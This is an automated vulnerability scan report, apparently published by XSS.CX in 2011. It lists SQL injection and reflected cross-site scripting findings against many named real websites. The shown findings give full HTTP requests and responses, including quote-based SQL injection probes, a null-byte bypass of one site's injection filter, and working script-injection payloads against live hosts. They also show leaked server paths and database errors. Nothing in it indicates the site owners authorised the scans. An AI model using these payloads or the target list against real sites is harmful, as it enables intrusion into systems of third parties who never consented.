XSS, SQL Injection, CWE-79, CWE-89, CAPEC-86, CAPEC-66, Vulnerable IP Hosts

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sat Apr 02 11:20:54 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler
Loading

1. SQL injection

1.1. http://www.danscomp.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.dunhillvacations.com/ [Referer HTTP header]

1.3. http://www.ic.cz/ [Referer HTTP header]

1.4. http://www.ifly.com/ [name of an arbitrarily supplied request parameter]

1.5. http://www.likem.net/ [Referer HTTP header]

1.6. http://www.likethislist.org/ [Referer HTTP header]

1.7. http://www.zemskov.net/ [Referer HTTP header]

2. Cross-site scripting (reflected)

2.1. http://www.4jobs.com/ [name of an arbitrarily supplied request parameter]

2.2. http://www.4teachers.org/ [name of an arbitrarily supplied request parameter]

2.3. http://www.acne.org/ [name of an arbitrarily supplied request parameter]

2.4. http://www.acne.org/ [name of an arbitrarily supplied request parameter]

2.5. http://www.actionext.com/ [name of an arbitrarily supplied request parameter]

2.6. http://www.actionext.com/ [name of an arbitrarily supplied request parameter]

2.7. http://www.adoption.com/ [name of an arbitrarily supplied request parameter]

2.8. http://www.adpost.com/ [name of an arbitrarily supplied request parameter]

2.9. http://www.allsubs.org/ [name of an arbitrarily supplied request parameter]

2.10. http://www.arcamax.com/ [name of an arbitrarily supplied request parameter]

2.11. http://www.betus.com/ [name of an arbitrarily supplied request parameter]

2.12. http://www.biblestudytools.com/ [name of an arbitrarily supplied request parameter]

2.13. http://www.blockbusterexpress.com/ [name of an arbitrarily supplied request parameter]

2.14. http://www.boardofwisdom.com/ [name of an arbitrarily supplied request parameter]

2.15. http://www.brainpop.com/ [name of an arbitrarily supplied request parameter]

2.16. http://www.chakpak.com/ [name of an arbitrarily supplied request parameter]

2.17. http://www.chakpak.com/ [name of an arbitrarily supplied request parameter]

2.18. http://www.couponconnector.com/ [name of an arbitrarily supplied request parameter]

2.19. http://www.curezone.com/ [name of an arbitrarily supplied request parameter]

2.20. http://www.curezone.com/ [name of an arbitrarily supplied request parameter]

2.21. http://www.dafont.com/ [name of an arbitrarily supplied request parameter]

2.22. http://www.dafont.com/ [name of an arbitrarily supplied request parameter]

2.23. http://www.dailystrength.org/ [name of an arbitrarily supplied request parameter]

2.24. http://www.ebgames.com/ [name of an arbitrarily supplied request parameter]

2.25. http://www.farmersalmanac.com/ [name of an arbitrarily supplied request parameter]

2.26. http://www.finecooking.com/ [name of an arbitrarily supplied request parameter]

2.27. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]

2.28. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]

2.29. http://www.hotboysatplay.com/ [name of an arbitrarily supplied request parameter]

2.30. http://www.importantscore.com/ [name of an arbitrarily supplied request parameter]

2.31. http://www.jobcentral.com/ [name of an arbitrarily supplied request parameter]

2.32. http://www.k12jobspot.com/ [name of an arbitrarily supplied request parameter]

2.33. http://www.ktvb.com/ [name of an arbitrarily supplied request parameter]

2.34. http://www.ktvb.com/ [name of an arbitrarily supplied request parameter]

2.35. http://www.lef.org/ [name of an arbitrarily supplied request parameter]

2.36. http://www.lyricsbox.com/ [name of an arbitrarily supplied request parameter]

2.37. http://www.lyricsbox.com/ [name of an arbitrarily supplied request parameter]

2.38. http://www.mobile9.com/ [name of an arbitrarily supplied request parameter]

2.39. http://www.musicloversgroup.com/ [name of an arbitrarily supplied request parameter]

2.40. http://www.networkworld.com/ [name of an arbitrarily supplied request parameter]

2.41. http://www.newhomesource.com/ [name of an arbitrarily supplied request parameter]

2.42. http://www.onlyteensvids.com/ [name of an arbitrarily supplied request parameter]

2.43. http://www.overthumbs.com/ [name of an arbitrarily supplied request parameter]

2.44. http://www.pnwlocalnews.com/ [name of an arbitrarily supplied request parameter]

2.45. http://www.pointstreak.com/ [name of an arbitrarily supplied request parameter]

2.46. http://www.puma.com/ [name of an arbitrarily supplied request parameter]

2.47. http://www.rd.com/ [name of an arbitrarily supplied request parameter]

2.48. http://www.recipelion.com/ [name of an arbitrarily supplied request parameter]

2.49. http://www.rheumatologychannel.com/ [name of an arbitrarily supplied request parameter]

2.50. http://www.rheumatologychannel.com/ [name of an arbitrarily supplied request parameter]

2.51. http://www.securelinkcorp.com/ [name of an arbitrarily supplied request parameter]

2.52. http://www.selectsips.com/ [name of an arbitrarily supplied request parameter]

2.53. http://www.slack-time.com/ [name of an arbitrarily supplied request parameter]

2.54. http://www.slack-time.com/ [name of an arbitrarily supplied request parameter]

2.55. http://www.spamfighter.com/ [name of an arbitrarily supplied request parameter]

2.56. http://www.suny.edu/ [name of an arbitrarily supplied request parameter]

2.57. http://www.teenspot.com/ [name of an arbitrarily supplied request parameter]

2.58. http://www.teleprofitsnow.com/ [name of an arbitrarily supplied request parameter]

2.59. http://www.trekbikes.com/ [name of an arbitrarily supplied request parameter]

2.60. http://www.ub.com/ [name of an arbitrarily supplied request parameter]

2.61. http://www.uci.edu/ [name of an arbitrarily supplied request parameter]

2.62. http://www.usedcars.com/ [name of an arbitrarily supplied request parameter]

2.63. http://www.viagra.com/ [name of an arbitrarily supplied request parameter]

2.64. http://www.visitlasvegas.com/ [name of an arbitrarily supplied request parameter]

2.65. http://www.worldstart.com/ [name of an arbitrarily supplied request parameter]

2.66. http://www.yankodesign.com/ [name of an arbitrarily supplied request parameter]

2.67. http://www.amatura.com/ [Referer HTTP header]

2.68. http://www.avantlink.com/ [User-Agent HTTP header]

2.69. http://www.beatmybox.com/ [Referer HTTP header]

2.70. http://www.bookofmatches.com/ [Referer HTTP header]

2.71. http://www.bradfordexchangechecks.com/ [Referer HTTP header]

2.72. http://www.christopherandbanks.com/ [Referer HTTP header]

2.73. http://www.curezone.com/ [Referer HTTP header]

2.74. http://www.curezone.com/ [Referer HTTP header]

2.75. http://www.deadoraliveinfo.com/ [Referer HTTP header]

2.76. http://www.foodnetworkstore.com/ [Referer HTTP header]

2.77. http://www.hairyhottie.com/ [Referer HTTP header]

2.78. http://www.la-sentinel.com/ [Referer HTTP header]

2.79. http://www.makeupalley.com/ [Referer HTTP header]

2.80. http://www.marketgid.com/ [Referer HTTP header]

2.81. http://www.metapress.com/ [User-Agent HTTP header]

2.82. http://www.networkworld.com/ [Referer HTTP header]

2.83. http://www.nmnathletics.com/ [Referer HTTP header]

2.84. http://www.nudist-girls.info/ [Referer HTTP header]

2.85. http://www.pacificpoker.com/ [User-Agent HTTP header]

2.86. http://www.postlets.com/ [Referer HTTP header]

2.87. http://www.postlets.com/ [User-Agent HTTP header]

2.88. http://www.riomature.com/ [Referer HTTP header]

2.89. http://www.riomoms.com/ [Referer HTTP header]

2.90. http://www.seniorfriendfinder.com/ [Referer HTTP header]

2.91. http://www.stvid.com/ [Referer HTTP header]

2.92. http://www.tiffany.com/ [Referer HTTP header]

2.93. http://www.toonfanclub.com/ [Referer HTTP header]

2.94. http://www.tubethumbs.com/ [Referer HTTP header]

2.95. http://www.usedcars.com/ [Referer HTTP header]

2.96. http://www.usedcars.com/ [User-Agent HTTP header]

2.97. http://www.vulvatube.com/ [Referer HTTP header]

2.98. http://www.workathomepositionplacement.com/ [Referer HTTP header]

2.99. http://www.8tracks.com/ [name of an arbitrarily supplied request parameter]

2.100. http://www.8tracks.com/ [name of an arbitrarily supplied request parameter]

2.101. http://www.alamo.com/ [name of an arbitrarily supplied request parameter]

2.102. http://www.alamo.com/ [name of an arbitrarily supplied request parameter]

2.103. http://www.alamo.com/ [name of an arbitrarily supplied request parameter]

2.104. http://www.downloadsquad.com/ [name of an arbitrarily supplied request parameter]

2.105. http://www.force.com/ [name of an arbitrarily supplied request parameter]

2.106. http://www.force.com/ [name of an arbitrarily supplied request parameter]

2.107. http://www.nationalcar.com/ [name of an arbitrarily supplied request parameter]

2.108. http://www.nationalcar.com/ [name of an arbitrarily supplied request parameter]

2.109. http://www.nationalcar.com/ [name of an arbitrarily supplied request parameter]

2.110. http://www.opinionoutpost.com/ [name of an arbitrarily supplied request parameter]

2.111. http://www.radioshackwireless.com/ [name of an arbitrarily supplied request parameter]

2.112. http://www.radioshackwireless.com/ [name of an arbitrarily supplied request parameter]

2.113. http://www.yadro.ru/ [name of an arbitrarily supplied request parameter]



1. SQL injection  next
There are 7 instances of this issue:


1.1. http://www.danscomp.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.danscomp.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.danscomp.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 02 Apr 2011 15:55:41 GMT
Server: Apache
Last-Modified: Sun, 15 Nov 2009 09:14:47 GMT
Accept-Ranges: bytes
Content-Length: 602
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>DANSCOMP</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="refresh" content="0;URL=http://www.danscomp.com">
</head>

<!--

...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.danscomp.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:55:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 44269
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<TITLE>DAN'S COMP - Bmx Bikes, Bmx Parts, Bmx Clothing, Bmx Shoes and Bmx Accessori
...[SNIP]...

1.2. http://www.dunhillvacations.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dunhillvacations.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dunhillvacations.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.2.3
Set-Cookie: token=46438%3A1301758136%3A17778; expires=Sat, 09-Apr-2011 15:28:56 GMT; domain=dunhillvacations.com
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 15:28:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="X-UA-Compatible" con
...[SNIP]...
</a>]: message: Line 1: Incorrect syntax near '2011'. (severity 15) in C:\Inetpub\www.dunhillvacations.com\wwwroot\includes\v3\token.php on line 35
PHP Warning: mssql_query() [<a href='function.mssql-query'>
...[SNIP]...
</a>]: message: Unclosed quotation mark before the character string ')'. (severity 15) in C:\Inetpub\www.dunhillvacations.com\wwwroot\includes\v3\token.php on line 35
PHP Warning: mssql_query() [<a href='function.mssql-query'>
...[SNIP]...

Request 2

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dunhillvacations.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.2.3
Set-Cookie: token=78142%3A1301758137%3A54898; expires=Sat, 09-Apr-2011 15:28:57 GMT; domain=dunhillvacations.com
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 15:28:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="X-UA-Compatible" con
...[SNIP]...

1.3. http://www.ic.cz/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ic.cz
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ic.cz
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:47:02 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Connection: close
Content-Type: text/html
Content-Length: 33983

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
...[SNIP]...

Request 2

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ic.cz
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:47:03 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Connection: close
Content-Type: text/html
Content-Length: 33834

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<head>
   <TITLE>IC.cz - webhosting zdarma, freehosting, PHP4, PHP5, MySql, PostgreSql, str.nky zdarma, blog, fotogalerie</TITLE>
   
...[SNIP]...

1.4. http://www.ifly.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ifly.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ifly.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:18:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 182
Content-Type: text/html; charset=ISO-8859-1

<br />
<b>Fatal error</b>: Call to a member function execute() on a non-object in <b>/var/www/html/powertrip/classes/plug-ins/DatabaseWrapper.class.php</b> on line <b>118</b><br />

Request 2

GET /?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ifly.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 15:18:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.ifly.com/search?cx=partner-pub-0781852406818918%3Aliggcq-9enj&cof=FORID%3A10&q=?1''=1
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1


1.5. http://www.likem.net/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.likem.net
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.likem.net
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:24:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25661

<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">

<head>


<meta property="fb:admins" content="636240531"
...[SNIP]...
<a href="http://likem.info/like/view/28997" class="fmllink">Illegal immigration is not a new problem, Native Americans used to call it 'White People'.</a>
...[SNIP]...

Request 2

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.likem.net
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:24:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25589

<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">

<head>


<meta property="fb:admins" content="636240531"
...[SNIP]...

1.6. http://www.likethislist.org/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.likethislist.org
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.likethislist.org
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:22:08 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Connection: close
Content-Type: text/html
Content-Length: 36488


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
<a href="http://www.likethislist.org/likes.php?t=257">The best things in life are either illegal, bad, or fattening.</a>
...[SNIP]...

Request 2

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.likethislist.org
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:22:09 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Connection: close
Content-Type: text/html
Content-Length: 36925


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...

1.7. http://www.zemskov.net/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zemskov.net
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zemskov.net
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 02 Apr 2011 15:05:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS_ID=1c37970a7d86bbf4b0296ad891a4e6c0; expires=Sun, 01-Apr-2012 15:05:41 GMT; path=/
Content-Length: 298
Connection: close
Content-Type: text/html

MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''google.com/search?hl=en&q='' LIMIT 1' at line 1 WITH SELECT * FROM @prefix@stat_referer_list WHERE re
...[SNIP]...

Request 2

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zemskov.net
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:05:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS_ID=1c37970a7d86bbf4b0296ad891a4e6c0; expires=Sun, 01-Apr-2012 15:05:41 GMT; path=/
Last-Modified: Wed, Mar 02 2011 12:24:14 GMT
ETag: 9003cec2f13cda4bc9ae87f32c468f77
Content-Length: 25916
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head><title>Email & PHP and MySql hosting. Free hosting and web mail.</title>
<meta http-equiv="Content-Type" content=
...[SNIP]...

2. Cross-site scripting (reflected)  previous
There are 113 instances of this issue:


2.1. http://www.4jobs.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.4jobs.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 5a5bb><a>48525712c9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?5a5bb><a>48525712c9b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4jobs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23943
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: PORTAL=PARTNER=4JOBS%2ECOM&CookieVersion=2%2E0&USERCOUNTRY=US&USERGID=590039464322416195&HTTPREFERRER=&USERSTATE=TEXAS&NEWUSERSITE=&DIDIPLKUP=Y; expires=Sun, 01-Apr-2012 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 15:03:43 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/cs
...[SNIP]...
zoneAlias=TR1_728x90_JS&r_sitepath=http://www.4jobs.com&r_partnerid=344072&r_partnersitename=4Jobs.com&t_pgid=213045580862436282&t_sn=/Default.asp&t_httph=www.4jobs.com&t_httpurl=/Default.asp&t_httpqs=5a5bb><a>48525712c9b=1&t_sgid=818312244230460616&t_ws=COLO-WEB06&t_ugid=590039464322416195&f_ip=173.193.214.243&ud=>
...[SNIP]...

2.2. http://www.4teachers.org/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4teachers.org
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef252"><script>alert(1)</script>0c5510a2826 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ef252"><script>alert(1)</script>0c5510a2826=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4teachers.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 16:10:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20740


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!--<meta http-equiv="Content-Type" content="text/html; charset=iso-88
...[SNIP]...
<a href="http://www.4teachers.org/?ef252"><script>alert(1)</script>0c5510a2826=1&lang=SP">
...[SNIP]...

2.3. http://www.acne.org/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acne.org
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6c680--><script>alert(1)</script>bec67766067 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6c680--><script>alert(1)</script>bec67766067=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.acne.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:29:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30641

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Acne.org - Acne treatment and community</title>
<meta http-equi
...[SNIP]...
<!-- ?6c680--><script>alert(1)</script>bec67766067=1 -->
...[SNIP]...

2.4. http://www.acne.org/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acne.org
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ef7'-alert(1)-'876c9abe3b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c8ef7'-alert(1)-'876c9abe3b9=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.acne.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:29:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30585

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
